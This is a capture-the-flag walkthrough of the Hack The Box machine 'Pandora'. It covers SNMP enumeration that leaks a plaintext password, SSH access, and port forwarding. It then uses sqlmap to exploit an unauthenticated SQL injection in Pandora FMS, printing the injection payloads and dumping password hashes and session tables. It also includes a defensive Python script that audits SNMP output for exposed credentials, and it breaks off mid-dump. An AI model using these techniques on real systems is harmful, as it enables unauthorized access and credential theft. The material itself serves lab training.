HTB - Pandora
Nmap Scan
Let's perform an nmap scan on the target machine,
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -sC -sV -A 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 10:51 EDT
Nmap scan report for 10.10.11.136
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.09 seconds
Finding other services,
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 10:53 EDT
Warning: 10.10.11.136 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.136
Host is up (0.21s latency).
Not shown: 9995 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1022/tcp filtered exp2
3996/tcp filtered abcsoftware
5091/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 149.09 seconds
So ssh and http are the only services running on this machine.
Enumeration
We cannot access ssh because we don't know the credentials yet. Since we have an http web service running, we can try enumerating it.
After browsing through the static web page, I found that I'm able to pass request parameters on the email form, but that doesn't lead anywhere.
There is a hint on the webpage suggesting that we create a hostname. Let's add a new hostname in our /etc/hosts file and perform the scan again
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -sC -sV -A panda.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 11:13 EDT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.13 seconds
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 panda.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 11:15 EDT
Warning: 10.10.11.136 giving up on port because retransmission cap hit (6).
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.21s latency).
Not shown: 9995 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
213/tcp filtered ipx
283/tcp filtered rescap
7753/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 133.54 seconds
Same results on doing the nmap scan. By default it scans only TCP ports, so let's scan UDP ports
┌──(kali㉿aidenpearce369)-[~]
└─$ sudo nmap -p1-300 -T4 panda.htb -sU
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 11:25 EDT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.26s latency).
Not shown: 284 closed udp ports (port-unreach)
PORT STATE SERVICE
21/udp open|filtered ftp
72/udp open|filtered netrjs-2
73/udp open|filtered netrjs-3
84/udp open|filtered ctf
161/udp open snmp
165/udp open|filtered xns-courier
174/udp open|filtered mailq
202/udp open|filtered at-nbp
204/udp open|filtered at-echo
209/udp open|filtered tam
215/udp open|filtered softpc
260/udp open|filtered openport
261/udp open|filtered nsiiops
269/udp open|filtered manet
275/udp open|filtered unknown
286/udp open|filtered fxp
Nmap done: 1 IP address (1 host up) scanned in 300.09 seconds
The snmp service is open
Enumerating SNMP
Since snmp uses the UDP protocol, let's use snmpwalk to enumerate the information exposed by this protocol
┌──(kali㉿aidenpearce369)-[~]
└─$ snmpwalk -v 1 -c public 10.10.11.136 > snmp-enum.txt
...
┌──(kali㉿aidenpearce369)-[~]
└─$ cat snmp-enum.txt -n | grep '\-u'
739 iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.4.0-91-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0 maybe-ubiquity
1279 iso.3.6.1.2.1.25.4.2.1.2.517 = STRING: "systemd-udevd"
1689 iso.3.6.1.2.1.25.4.2.1.4.517 = STRING: "/lib/systemd/systemd-udevd"
1735 iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: "maybe-ubiquity"
1914 iso.3.6.1.2.1.25.4.2.1.5.898 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
1916 iso.3.6.1.2.1.25.4.2.1.5.902 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
1923 iso.3.6.1.2.1.25.4.2.1.5.1100 = STRING: "-u daniel -p HotelBabylon23"
Alternatively, we can use the metasploit module to perform SNMP enumeration
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.11.136
RHOSTS => 10.10.11.136
msf6 auxiliary(scanner/snmp/snmp_enum) > run
[+] 10.10.11.136, Connected.
[*] System information:
Host IP : 10.10.11.136
Hostname : pandora
Description : Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
Contact : Daniel
Location : Mississippi
Uptime snmp : 01:10:29.61
Uptime system : 01:10:16.49
System date : 2022-3-30 16:05:12.0
[*] Network information:
IP forwarding enabled : no
Default TTL : 64
TCP segments received : 176958
TCP segments sent : 178677
TCP segments retrans : 1338
Input datagrams : 184979
Delivered datagrams : 184979
Output datagrams : 187172
...
672 unknown ext4-rsv-conver
686 runnable systemd-resolve /lib/systemd/systemd-resolved
687 runnable systemd-timesyn /lib/systemd/systemd-timesyncd
696 runnable VGAuthService /usr/bin/VGAuthService
697 runnable vmtoolsd /usr/bin/vmtoolsd
757 runnable accounts-daemon /usr/lib/accountsservice/accounts-daemon
758 runnable dbus-daemon /usr/bin/dbus-daemon--system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
762 runnable irqbalance /usr/sbin/irqbalance--foreground
766 runnable networkd-dispat /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
767 runnable rsyslogd /usr/sbin/rsyslogd -n -iNONE
772 runnable systemd-logind /lib/systemd/systemd-logind
773 runnable udisksd /usr/lib/udisks2/udisksd
828 runnable polkitd /usr/lib/policykit-1/polkitd--no-debug
870 runnable cron /usr/sbin/cron -f
880 runnable cron /usr/sbin/CRON -f
898 runnable sh /bin/sh -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
901 runnable atd /usr/sbin/atd -f
902 running snmpd /usr/sbin/snmpd -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid
903 runnable sshd sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
959 runnable agetty /sbin/agetty -o -p -- \u --noclear tty1 linux
968 runnable apache2 /usr/sbin/apache2 -k start
1017 runnable mysqld /usr/sbin/mysqld
1018 runnable apache2 /usr/sbin/apache2 -k start
1019 runnable apache2 /usr/sbin/apache2 -k start
1100 runnable host_check /usr/bin/host_check -u daniel -p HotelBabylon23
1189 runnable apache2 /usr/sbin/apache2 -k start
1209 runnable apache2 /usr/sbin/apache2 -k start
1215 runnable apache2 /usr/sbin/apache2 -k start
1502 unknown kworker/1:0-events
1831 runnable apache2 /usr/sbin/apache2 -k start
1842 runnable apache2 /usr/sbin/apache2 -k start
2064 runnable apache2 /usr/sbin/apache2 -k start
2065 runnable apache2 /usr/sbin/apache2 -k start
2280 unknown kworker/u4:1-events_power_efficient
2514 unknown kworker/u4:2-events_power_efficient
2515 unknown kworker/0:0-events
2518 unknown kworker/1:2-events
2977 runnable apache2 /usr/sbin/apache2 -k start
3266 unknown kworker/1:1-events
3267 unknown kworker/1:3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
From this information, we have a credential: -u daniel -p HotelBabylon23
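The credential above was readable because SNMP's hrSWRunParameters table publishes every process's argv. As an added example (not from the original writeup), this Python script parses snmpwalk rows of that table and flags arguments that look like a password; the sample rows are constructed from the values shown above, and the function names are this example's own.

```python
"""Audit snmpwalk output for process command lines that leak credentials.

Added example, not from the original writeup. The HOST-RESOURCES-MIB
hrSWRunParameters column (OID prefix iso.3.6.1.2.1.25.4.2.1.5, one row per
PID) hands every process's argv to anyone holding the read community, which
is how daniel's password was found above. find_exposed_secrets() parses
those rows and reports arguments that look like a password; the -p used by
snmpd for its pid file shows why path-like values get a lower confidence.
The sample rows are constructed from the values shown in the writeup.
"""
import re
import shlex

HR_SW_RUN_PARAMETERS = "iso.3.6.1.2.1.25.4.2.1.5."
ROW_RE = re.compile(r'^(?P<oid>iso(?:\.\d+)+) = STRING: "(?P<value>.*)"\s*$')
# Flags that normally introduce a secret, plus key=value forms.
PASSWORD_FLAGS = {"-p", "--password", "-pw", "--pass"}
PASSWORD_KV_RE = re.compile(r"^(pass(?:word|wd)?|pwd|secret|token)=(.+)$", re.I)

# Constructed sample: the rows from the snmpwalk above, plus the snmpd row.
SAMPLE_WALK = """\
iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: "maybe-ubiquity"
iso.3.6.1.2.1.25.4.2.1.5.898 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.902 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.1100 = STRING: "-u daniel -p HotelBabylon23"
"""


def _tokens(value):
    """Split a command line like a shell would, descending into quoted
    sub-commands (bash -c '...') so that nested flags are inspected too."""
    try:
        parts = shlex.split(value)
    except ValueError:            # unbalanced quotes: fall back to whitespace
        parts = value.split()
    out = []
    for part in parts:
        out.extend(_tokens(part) if any(c.isspace() for c in part) else [part])
    return out


def find_exposed_secrets(walk_text):
    """Return one finding per credential-looking argument, in row order."""
    findings = []
    for line in walk_text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m or not m.group("oid").startswith(HR_SW_RUN_PARAMETERS):
            continue
        pid = int(m.group("oid")[len(HR_SW_RUN_PARAMETERS):])
        toks = _tokens(m.group("value"))
        user = None
        for i, tok in enumerate(toks):
            if tok == "-u" and i + 1 < len(toks):
                user = toks[i + 1]            # remember the paired username
            if tok in PASSWORD_FLAGS and i + 1 < len(toks):
                secret = toks[i + 1]
                # "-p /run/snmpd.pid" is a pid file, not a password: report
                # path-like values at low confidence instead of dropping them.
                conf = "low" if secret.startswith("/") else "high"
                findings.append({"pid": pid, "user": user, "flag": tok,
                                 "secret": secret, "confidence": conf})
            else:
                kv = PASSWORD_KV_RE.match(tok)
                if kv:
                    findings.append({"pid": pid, "user": user, "flag": kv.group(1),
                                     "secret": kv.group(2), "confidence": "high"})
    return findings


if __name__ == "__main__":
    for f in find_exposed_secrets(SAMPLE_WALK):
        print(f"pid {f['pid']:>5} user={f['user']!s:<12} {f['flag']} "
              f"-> {f['secret']} ({f['confidence']})")
```

The fix belongs on the host: host_check should read its password from a file or the environment rather than argv, which ps, /proc and the SNMP hrSWRunTable all expose, and the hrSWRun view should not be readable with the default community.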
Gaining Foothold
Let's try to log in via SSH
┌──(kali㉿aidenpearce369)-[~]
└─$ ssh daniel@panda.htb
The authenticity of host 'panda.htb (10.10.11.136)' can't be established.
ED25519 key fingerprint is SHA256:yDtxiXxKzUipXy+nLREcsfpv/fRomqveZjm6PXq9+BY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'panda.htb' (ED25519) to the list of known hosts.
daniel@panda.htb's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 30 Mar 16:16:55 UTC 2022
System load: 0.0
Usage of /: 63.3% of 4.87GB
Memory usage: 8%
Swap usage: 0%
Processes: 231
Users logged in: 0
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:e7c7
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
daniel@pandora:~$ whoami
daniel
We don't have permission to read the user flag yet,
daniel@pandora:/home$ ls
daniel matt
daniel@pandora:/home$ cd matt
daniel@pandora:/home/matt$ ls
user.txt
daniel@pandora:/home/matt$ cat user.txt
cat: user.txt: Permission denied
daniel@pandora:/home/matt$
Trying standard privilege escalation techniques, we find some SUID binaries
daniel@pandora:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/pandora_backup seems interesting, and /usr/bin/at can be used to bypass a restricted shell
daniel@pandora:~$ ls -l /usr/bin/at
-rwsr-sr-x 1 daemon daemon 55560 Nov 12 2018 /usr/bin/at
daniel@pandora:~$ ls -l /usr/bin/pandora_backup
-rwsr-x--- 1 root matt 16816 Dec 3 15:58 /usr/bin/pandora_backup
The second user, matt, can run /usr/bin/pandora_backup, so we need to get to matt
Downloading linpeas.sh from our attacker machine,
daniel@pandora:~$ wget http://10.10.14.5:8000/linpeas.sh
--2022-03-30 16:21:53-- http://10.10.14.5:8000/linpeas.sh
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 775707 (758K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[============================================================================>] 757.53K 458KB/s in 1.7s
2022-03-30 16:21:55 (458 KB/s) - ‘linpeas.sh’ saved [775707/775707]
Running linPEAS shows that the sudo version is 1.8.31, which is vulnerable
daniel@pandora:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
daniel@pandora:~$ which python3
/usr/bin/python3
daniel@pandora:~$ python3 exploit_nss.py
Traceback (most recent call last):
File "exploit_nss.py", line 220, in <module>
assert check_is_vuln(), "target is patched"
AssertionError: target is patched
But running the exploit shows that the target is patched
Looking at the process list, there are many apache processes and a mysql process
daniel@pandora:/var$ ps -aux
...
root 968 0.0 0.7 227944 30768 ? Ss 14:54 0:00 /usr/sbin/apache2 -k start
mysql 1017 0.0 2.3 1710488 93948 ? Ssl 14:54 0:03 /usr/sbin/mysqld
www-data 1018 0.0 0.3 228348 14380 ? S 14:54 0:00 /usr/sbin/apache2 -k start
www-data 1019 0.0 0.3 228348 14380 ? S 14:54 0:00 /usr/sbin/apache2 -k start
root 1100 0.0 0.0 2488 1388 ? S 14:55 0:00 /usr/bin/host_check -u daniel -p HotelBabylon23
www-data 1189 0.0 0.3 228348 14384 ? S 14:58 0:00 /usr/sbin/apache2 -k start
www-data 1209 0.0 0.3 228348 14384 ? S 15:00 0:00 /usr/sbin/apache2 -k start
www-data 1215 0.0 0.3 228348 14384 ? S 15:00 0:00 /usr/sbin/apache2 -k start
www-data 1831 0.0 0.3 228348 14384 ? S 15:18 0:00 /usr/sbin/apache2 -k start
www-data 1842 0.0 0.3 228348 14384 ? S 15:18 0:00 /usr/sbin/apache2 -k start
www-data 2064 0.0 0.3 228348 14384 ? S 15:26 0:00 /usr/sbin/apache2 -k start
www-data 2065 0.0 0.3 228348 14384 ? S 15:26 0:00 /usr/sbin/apache2 -k start
www-data 2977 0.0 0.3 228348 14384 ? S 15:58 0:00 /usr/sbin/apache2 -k start
We could not access mysql with our current user's creds
daniel@pandora:/var$ mysql -u daniel -p
Enter password:
ERROR 1045 (28000): Access denied for user 'daniel'@'localhost' (using password: YES)
Since there are many apache processes running in the background, after enumerating it seems there are two web apps running on this machine
daniel@pandora:/var/www$ ls
html pandora
daniel@pandora:/var/www$ ls html/
assets index.html
daniel@pandora:/var/www$ ls pandora/
index.html pandora_console
daniel@pandora:/var/www$ cat /etc/hosts
127.0.0.1 localhost.localdomain pandora.htb pandora.pandora.htb
127.0.1.1 pandora
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Testing it with the curl command,
daniel@pandora:/var/www$ curl localhost
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">
daniel@pandora:/var/www$ curl http://localhost/pandora_console
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://localhost/pandora_console/">here</a>.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at localhost Port 80</address>
</body></html>
daniel@pandora:/var/www$ curl http://localhost/pandora_console/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...
So there is another web app running internally. To access this web app we need port forwarding, which can be done with ssh
┌──(kali㉿aidenpearce369)-[~]
└─$ ssh -L 8081:127.0.0.1:80 -N daniel@panda.htb
daniel@panda.htb's password:
Now we can access the internal web app on port 8081 of our local machine
Privilege Escalation
We have a login page right in front of us. Tried a generic SQLi payload, but it did not work.
From the information given on the site, it is running Pandora FMS version v7.0NG742. Let's search for an exploit for this specific version,
┌──(kali㉿aidenpearce369)-[~]
└─$ searchsploit pandora 7.0
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Pandora 7.0NG - Remote Code Execution | php/webapps/47898.py
Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated) | php/webapps/49046.txt
Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities | php/webapps/49139.txt
Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated) | php/webapps/49312.txt
Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution | php/webapps/48280.py
PANDORAFMS 7.0 - Authenticated Remote Code Execution | php/webapps/48064.py
PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting | php/webapps/48707.txt
PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting | php/webapps/48700.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
But googling the specific version number, the first link gives interesting results: this version has an unauthenticated SQLi, and since we have mysql running, let's try it.
The exploit referred to there targets this CMS, and the SQLi is a union-based attack. Let's run sqlmap on the vulnerable URI
┌──(kali㉿aidenpearce369)-[~]
└─$ sqlmap --url="http://localhost:8081/pandora_console/include/chart_generator.php?session_id=''" --dbms=mysql --dump
___
__H__
___ ___[.]_____ ___ ___ {1.6.3#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:13:19 /2022-03-30/
[13:13:19] [INFO] testing connection to the target URL
[13:13:19] [WARNING] potential permission problems detected ('Access denied')
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=koihrjg9bqn...s4mdrdmie7'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: session_id=-5176' OR 2190=2190#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: session_id=''' OR (SELECT 2464 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2464=2464,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IdPE
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: session_id=''' AND (SELECT 2215 FROM (SELECT(SLEEP(5)))mPZg)-- gdEY
---
[13:13:22] [INFO] testing MySQL
[13:13:22] [INFO] confirming MySQL
[13:13:23] [WARNING] reflective value(s) found and filtering out
[13:13:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:13:23] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[13:13:23] [INFO] fetching current database
[13:13:23] [INFO] retrieved: 'pandora'
[13:13:23] [INFO] fetching tables for database: 'pandora'
...
We have found that the database name is pandora. Dumping the tpassword_history table,
┌──(kali㉿aidenpearce369)-[~]
└─$ sqlmap --url="http://localhost:8081/pandora_console/include/chart_generator.php?session_id=''" --dbms=mysql -D pandora -T tpassword_history --dump
___
__H__
___ ___[(]_____ ___ ___ {1.6.3#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:26:11 /2022-03-30/
[13:26:11] [INFO] testing connection to the target URL
[13:26:11] [WARNING] potential permission problems detected ('Access denied')
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=6up1pgja7ic...uoqu641vi3'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: session_id=-5176' OR 2190=2190#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: session_id=''' OR (SELECT 2464 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2464=2464,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IdPE
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: session_id=''' AND (SELECT 2215 FROM (SELECT(SLEEP(5)))mPZg)-- gdEY
---
[13:26:13] [INFO] testing MySQL
[13:26:13] [INFO] confirming MySQL
[13:26:14] [WARNING] reflective value(s) found and filtering out
[13:26:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:26:14] [INFO] fetching columns for table 'tpassword_history' in database 'pandora'
[13:26:14] [INFO] resumed: 'id_pass'
[13:26:14] [INFO] resumed: 'int(10) unsigned'
[13:26:14] [INFO] resumed: 'id_user'
[13:26:14] [INFO] resumed: 'varchar(60)'
[13:26:14] [INFO] resumed: 'password'
[13:26:14] [INFO] resumed: 'varchar(45)'
[13:26:14] [INFO] resumed: 'date_begin'
[13:26:14] [INFO] resumed: 'datetime'
[13:26:14] [INFO] resumed: 'date_end'
[13:26:14] [INFO] resumed: 'datetime'
[13:26:14] [INFO] fetching entries for table 'tpassword_history' in database 'pandora'
[13:26:14] [INFO] resumed: '2021-06-11 17:28:54'
[13:26:14] [INFO] resumed: '0000-00-00 00:00:00'
[13:26:14] [INFO] resumed: '1'
[13:26:14] [INFO] resumed: 'matt'
[13:26:14] [INFO] resumed: 'f655f807365b6dc602b31ab3d6d43acc'
[13:26:14] [INFO] resumed: '2021-06-17 00:11:54'
[13:26:14] [INFO] resumed: '0000-00-00 00:00:00'
[13:26:14] [INFO] resumed: '2'
[13:26:14] [INFO] resumed: 'daniel'
[13:26:14] [INFO] resumed: '76323c174bd49ffbbdedf678f6cc89a6'
[13:26:14] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: pandora
Table: tpassword_history
[2 entries]
+---------+---------+---------------------+----------------------------------+---------------------+
| id_pass | id_user | date_end | password | date_begin |
+---------+---------+---------------------+----------------------------------+---------------------+
| 1 | matt | 0000-00-00 00:00:00 | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 |
| 2 | daniel | 0000-00-00 00:00:00 | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 |
+---------+---------+---------------------+----------------------------------+---------------------+
[13:26:19] [INFO] table 'pandora.tpassword_history' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/pandora/tpassword_history.csv'
[13:26:19] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'
[*] ending @ 13:26:19 /2022-03-30/
Dumping values from the tsessions_php table,
┌──(kali㉿aidenpearce369)-[~]
└─$ sqlmap --url="http://localhost:8081/pandora_console/include/chart_generator.php?session_id=''" --dbms=mysql -D pandora -T tsessions_php --dump
___
__H__
___ ___[,]_____ ___ ___ {1.6.3#stable}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:27:32 /2022-03-30/
[13:27:32] [INFO] testing connection to the target URL
[13:27:33] [WARNING] potential permission problems detected ('Access denied')
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=92h891j6qs1...2e4r9vlg39'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: session_id=-5176' OR 2190=2190#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: session_id=''' OR (SELECT 2464 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2464=2464,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IdPE
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: session_id=''' AND (SELECT 2215 FROM (SELECT(SLEEP(5)))mPZg)-- gdEY
---
[13:27:34] [INFO] testing MySQL
[13:27:34] [INFO] confirming MySQL
[13:27:35] [WARNING] reflective value(s) found and filtering out
[13:27:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:27:35] [INFO] fetching columns for table 'tsessions_php' in database 'pandora'
...
Database: pandora
Table: tsessions_php
[56 entries]
+----------------------------+-----------------------------------------------------+-------------+
| id_session | data | last_active |
+----------------------------+-----------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel"; | 1638783555 |
| 0ahul7feb1l9db7ffp8d25sjba | NULL | 1638789018 |
| 130or2fa7sjfo5alc260nutu0t | id_usuario|s:6:"daniel"; | 1648652125 |
| 1cqctk2bd1goq81nog694bmsdg | id_usuario|s:6:"daniel"; | 1648660609 |
| 1um23if7s531kqf5da14kf5lvm | NULL | 1638792211 |
| 2e25c62vc3odbppmg6pjbf9bum | NULL | 1638786129 |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel"; | 1638540332 |
| 3me2jjab4atfa5f8106iklh4fc | NULL | 1638795380 |
| 4f51mju7kcuonuqor3876n8o02 | NULL | 1638786842 |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel"; | 1638535373 |
